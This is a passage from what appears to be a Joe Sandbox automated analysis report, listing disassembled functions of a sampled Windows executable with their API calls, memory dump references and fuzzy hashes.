                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC36A6
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC36EB
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC3703
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC3722
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Write_get_osfhandle$Mode
                                      • String ID:
                                      • API String ID: 1066134489-0
                                      • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                      • Instruction ID: 900ff15a2e2c5b54b1ba04ea21afc0b10fdbf59e3052af965575184cb7b346ec
                                      • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                      • Instruction Fuzzy Hash: C651B2ABB0864397EA646F21E50417AE6A0FF45F98F8C9435CE1E47791DF3CE4418B20
                                      Function 00007FF755CA89C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                      • String ID:
                                      • API String ID: 850181435-0
                                      • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                      • Instruction ID: a13d0db209a67bc175d0de78ec16218d0bb120d775274daa8a4d0b866a99427d
                                      • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                      • Instruction Fuzzy Hash: BF414FB7608BC2CAE760DF20D8442E9BBA4FB89F49F994525DA4D8BB48CF38D545C710
                                      Function 00007FF755CB34A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB3514
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB3522
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB3541
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB355E
                                        • Part of subcall function 00007FF755CB36EC: _get_osfhandle.MSVCRT ref: 00007FF755CB3715
                                        • Part of subcall function 00007FF755CB36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF755CB3770
                                        • Part of subcall function 00007FF755CB36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB3791
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                      • String ID:
                                      • API String ID: 4057327938-0
                                      • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                      • Instruction ID: 33b7af2feeeaac17bedf4c4173c704ed46a70c0430815679f37b0e9d00f631c1
                                      • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                      • Instruction Fuzzy Hash: 113186ABF08A4396EB51BB15941007DEAA0FF89F59FCC4135DD0E83795DE3CE8448620
                                      Function 00007FF755CCBE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                      • String ID: KEYS$LIST$OFF
                                      • API String ID: 411561164-4129271751
                                      • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                      • Instruction ID: 9ef030d8d5e329570567e03cb8fed89315c2725405dca1fab01f63838a00a5db
                                      • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                      • Instruction Fuzzy Hash: B921A5BFA0864392F754BB65E450075E7A1EF45F5CFC8A235C62E862E4EE7C94848220
                                      Function 00007FF755CB01B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB0212
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB0228
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB023C
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB0251
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                      • String ID:
                                      • API String ID: 513048808-0
                                      • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                      • Instruction ID: d86720810ec411b6d5f4f94d3cf28067c1eb151cb64a08c4bd837a3a87df9df0
                                      • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                      • Instruction Fuzzy Hash: 662165AB90C68387EA546B54E584238FA90FF49F6DFDC4138D90E52694CF7CF8488721
                                      Function 00007FF755CB9584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 4104442557-0
                                      • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                      • Instruction ID: 09c57958370af3113c1dba190fe357939b053acf9a815443253527259956cc17
                                      • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                      • Instruction Fuzzy Hash: 54114266B04F828BEB40EF74E84416873A4F749B5CF840A35EA6D87754DF3CD5548350
                                      Function 00007FF755CB3578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                      • String ID:
                                      • API String ID: 513048808-0
                                      • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                      • Instruction ID: 209fb59d52ebef1f9c90a6fad6315549ee39ceabdd2b615ec950e739e3712af0
                                      • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                      • Instruction Fuzzy Hash: 631151BAA08A8386EA506B64A554078EAA0FF4AF79FDC5335D92F433D0DE3CD8458710
                                      Function 00007FF755CC711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CC71F9
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CC720D
                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CC7300
                                        • Part of subcall function 00007FF755CC5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF755CC75C4,?,?,00000000,00007FF755CC6999,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC5744
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: OpenSemaphore$CloseErrorHandleLast
                                      • String ID: _p0$wil
                                      • API String ID: 455305043-1814513734
                                      • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                      • Instruction ID: c95d6d30fe2d28ed92e77995515a0e19b885b6e8159abf3bc6699f9849ceb881
                                      • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                      • Instruction Fuzzy Hash: B661B0ABB18A83C1EE61AB6595141B9A3E1EF84F88FDC6435DA1E47794EF3CD5008320
                                      Function 00007FF755CA1DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspacememset$AllocProcess
                                      • String ID: %s
                                      • API String ID: 2401724867-3043279178
                                      • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                      • Instruction ID: 59f22f30dca067675f332b1fa4620251a3452ecb6ce49aa8742f0b66d75e577b
                                      • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                      • Instruction Fuzzy Hash: 5F51A3BBA0868385EB61AF11D8502B9B7A0EB49F98FC85135DA5D47794EF3CE441C720
                                      Function 00007FF755CAE260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit
                                      • String ID: GeToken: (%x) '%s'
                                      • API String ID: 3849470556-1994581435
                                      • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                      • Instruction ID: 15c3124fb9d39e7d333c8b9ad81e49a0f3ef7bf77a1f95637a46b36c8adfa514
                                      • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                      • Instruction Fuzzy Hash: 5A519CBBA0864385E760AF55E484179BBA0FF45F18F889935DA4D43390EF7CE841C3A0
                                      Function 00007FF755CC992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CC9A10
                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CC9994
                                        • Part of subcall function 00007FF755CCA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA77A
                                        • Part of subcall function 00007FF755CCA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA839
                                        • Part of subcall function 00007FF755CCA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA850
                                      • wcsrchr.MSVCRT ref: 00007FF755CC9A62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                      • String ID: %s=%s$.
                                      • API String ID: 3242694432-4275322459
                                      • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                      • Instruction ID: 27c4f8f620c13c1c9dfadd32d95ead1ee4bf5e8d9e85688c29a768319006fee1
                                      • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                      • Instruction Fuzzy Hash: 2841A0ABA0978385EA10BB51A450279E6A0AF85FA8FC85630DD6D0B7D1EE3CF4418320
                                      Function 00007FF755CC54B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CC54E6
                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CC552E
                                        • Part of subcall function 00007FF755CC758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF755CC6999,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC75AE
                                        • Part of subcall function 00007FF755CC758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF755CC6999,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC75C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateCurrentMutexProcess
                                      • String ID: Local\SM0:%d:%d:%hs$wil$x
                                      • API String ID: 779401067-630742106
                                      • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                      • Instruction ID: 319a19ab9d677036dfa3adb70757eb59e886d9fc75ab889eba3dfb13c592bdea
                                      • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                      • Instruction Fuzzy Hash: 4951A6BBA1868382EB51AB15E4047FAE360EF84F98FD85032DA5D8BB55DE3CD445C720
                                      Function 00007FF755CB417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CurrentDirectorytowupper
                                      • String ID: :$:
                                      • API String ID: 238703822-3780739392
                                      • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                      • Instruction ID: 4e3324ae72aaf9f588b44bcb50bfcacf3b9686d3de5c799d8bc5a0741d79b3bb
                                      • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                      • Instruction Fuzzy Hash: F511389BA0824281EB24AB61A804239F6E0EF8DFADFCD8132DD0D47751DF3CD4018724
                                      Function 00007FF755CA58D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
